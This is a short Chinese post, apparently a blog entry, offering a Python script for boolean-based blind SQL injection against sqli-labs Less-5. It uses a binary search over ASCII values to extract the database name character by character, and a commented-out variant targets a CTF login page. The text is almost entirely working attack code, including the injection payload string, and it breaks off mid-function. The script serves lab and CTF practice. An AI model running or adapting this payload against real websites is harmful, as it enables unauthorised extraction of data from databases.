sql盲注二分法注入脚本
次脚本可以用来检测sql靶场第五关
http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1
#-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http://127.0.0.1/sqlilabs/Less-5/?id=1" ''' def getDatabase(): #获取数据库名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("database is -> "+ans) ''' def getDatabase(): #获取数据库名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)
